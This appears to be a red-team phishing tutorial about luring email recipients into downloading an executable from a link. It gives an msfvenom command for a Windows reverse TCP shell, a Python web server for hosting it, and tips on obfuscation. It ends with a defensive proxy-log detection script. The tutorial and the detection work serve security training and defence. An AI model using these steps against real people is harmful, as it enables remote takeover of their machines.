Links: Binaries

The use of binaries has decreased considerably, but this is still a good example of how users download EXE files and give access to attackers. Remember, the weakest link is sometimes not a machine but the user.

I will demonstrate a simple chat-style email that contains a link to download the executable; that way the binary itself is never scanned by the email security measures. Clicking the link will simply give the user a prompt to download or run the binary.

The use of msfvenom here is very simple; the tool is widely known in the security industry, and it's also great for creating payloads quickly. You can combine different methods of packaging, obfuscation or stripping to make your payload harder to detect. This attack can also be considered an Attachment attack, as I will place the link in a PDF file attached to the email, but the main attack vector will still be a link.

We will create a simple binary payload using msfvenom:

msfvenom --platform windows --arch x64 --payload windows/x64/shell/reverse_tcp LHOST=<YOUR IP> LPORT=<YOUR PORT> --format exe --out payload.ex

We can host this payload on a web server and send the full link in our phishing pretext: a simple email telling the user about the new game that just arrived in stores.

(Don't worry I would've clicked it as well.)

After clicking the link, the user will be prompted to download the payload, and from here that should be enough to have them run it.

In the following example I hosted the payload using Python's simple HTTP web server. You can start this by using the following command:

python3 -m http.server

Once we get the user to execute the payload we will receive a shell back to our machine.

This is a simple but very effective technique for gaining a shell. You won't see it much, or probably ever, but it used to be a very effective and successful technique.

We embedded a link in our email, had the user download a binary, and gained execution.
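From the defender's side, the delivery described above leaves a recognisable trace in web proxy logs: a successful executable download over plain HTTP from a bare IP address whose Server header starts with "SimpleHTTP/", which is what python3 -m http.server sends. The following is an added example, not code from the original page; the log field names and the sample records are constructed assumptions.

```python
import ipaddress
import json
from urllib.parse import urlsplit

EXEC_EXTENSIONS = (".exe", ".scr", ".msi")
EXEC_TYPES = {"application/x-msdownload", "application/x-msdos-program", "application/x-dosexec"}

# Constructed sample records; the field names are assumptions, not a real proxy schema.
SAMPLE_LOG = """\
{"client": "10.0.4.17", "url": "http://203.0.113.45:8000/payload.exe", "status": 200, "server": "SimpleHTTP/0.6 Python/3.11.2", "content_type": "application/x-msdos-program"}
{"client": "10.0.4.22", "url": "https://downloads.example.com/setup/tool-installer.exe", "status": 200, "server": "nginx", "content_type": "application/octet-stream"}
{"client": "10.0.4.17", "url": "http://203.0.113.45:8000/", "status": 200, "server": "SimpleHTTP/0.6 Python/3.11.2", "content_type": "text/html; charset=utf-8"}
{"client": "10.0.4.31", "url": "http://198.51.100.9/update.exe", "status": 404, "server": "Apache", "content_type": "text/html"}
"""

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def assess(record):
    """Return the reasons a completed download looks like a linked-binary lure."""
    url = urlsplit(record["url"])
    ctype = record.get("content_type", "").split(";")[0].strip().lower()
    is_exec = url.path.lower().endswith(EXEC_EXTENSIONS) or ctype in EXEC_TYPES
    if record.get("status") != 200 or not is_exec:
        return []  # only completed executable downloads are scored
    reasons = ["executable download"]
    if record.get("server", "").startswith("SimpleHTTP/"):
        reasons.append("served by python http.server")
    if is_ip_literal(url.hostname or ""):
        reasons.append("host is a bare IP address")
    if url.scheme == "http":
        reasons.append("plain HTTP")
    return reasons

def find_suspicious(log_text, min_reasons=3):
    """Return (client, url, reasons) for records with at least min_reasons signals."""
    records = [json.loads(line) for line in log_text.strip().splitlines()]
    scored = [(r["client"], r["url"], assess(r)) for r in records]
    return [hit for hit in scored if len(hit[2]) >= min_reasons]

if __name__ == "__main__":
    for client, url, reasons in find_suspicious(SAMPLE_LOG):
        print(client, url, "; ".join(reasons))
```

The min_reasons threshold keeps ordinary installer downloads from vendor sites out of the results; tune it against your own proxy data before alerting on it.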
